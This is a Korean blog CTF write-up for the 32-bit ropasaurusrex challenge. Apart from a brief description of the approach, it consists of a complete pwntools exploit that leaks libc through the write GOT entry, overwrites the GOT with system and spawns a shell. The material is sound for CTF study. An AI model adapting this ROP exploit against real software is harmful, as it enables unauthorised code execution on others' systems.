전형적인 32 비트 ROP 문제이다.
공격 시나리오는 메모리 leak 을 시킨다음에 그걸로 offset 계산해서 익스시켜주면 되는 문제이다.
함수는 read 랑 write 함수가 주어진다. 그냥 개꿀하고 정석 ROP 로 익스시켜주면된다.
from pwn import *
#context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
p = process("./ropasaurusrex")
binf = ELF("./ropasaurusrex")
#gdb.attach(p)
write_plt = binf.plt['write']
write_got = binf.got['write']
read_plt = binf.plt['read']
read_got = binf.got['write']
bss = binf.bss()
pppr_gadget = 0x080484b6
write_offset = 0xbd630
system_offset = 0x22860
payload = "A"*140
payload += p32(write_plt)
payload += p32(pppr_gadget)
payload += p32(1)
payload += p32(write_got)
payload += p32(4)
payload += p32(read_plt)
payload += p32(pppr_gadget)
payload += p32(0)
payload += p32(bss)
payload += p32(8)
payload += p32(read_plt)
payload += p32(pppr_gadget)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)
payload += p32(write_plt)
payload += "A"*4
payload += p32(bss)
p.send(payload)
leak = u32(p.recv(4))
addr_libc_base = leak - write_offset
addr_libc_system = addr_libc_base + system_offset
log.info("leak address: " + hex(leak))
log.info("libc base: " + hex(addr_libc_base))
log.info("libc_system: " + hex(addr_libc_system))
p.send("/bin/sh\x00")
p.send(p32(addr_libc_system))
p.interactive()이런식으로 익스를 시켜주면 쉘을 딸수 있다.
'CTF > Defcon' 카테고리의 다른 글
| Defcon pwnable_speedrun-002 Write up (0) | 2019.10.23 |
|---|---|
| Defcon pwnable_speedrun-001 Write up (0) | 2019.10.23 |
| Defcon pwnable_r0pbaby Write up (0) | 2019.10.20 |
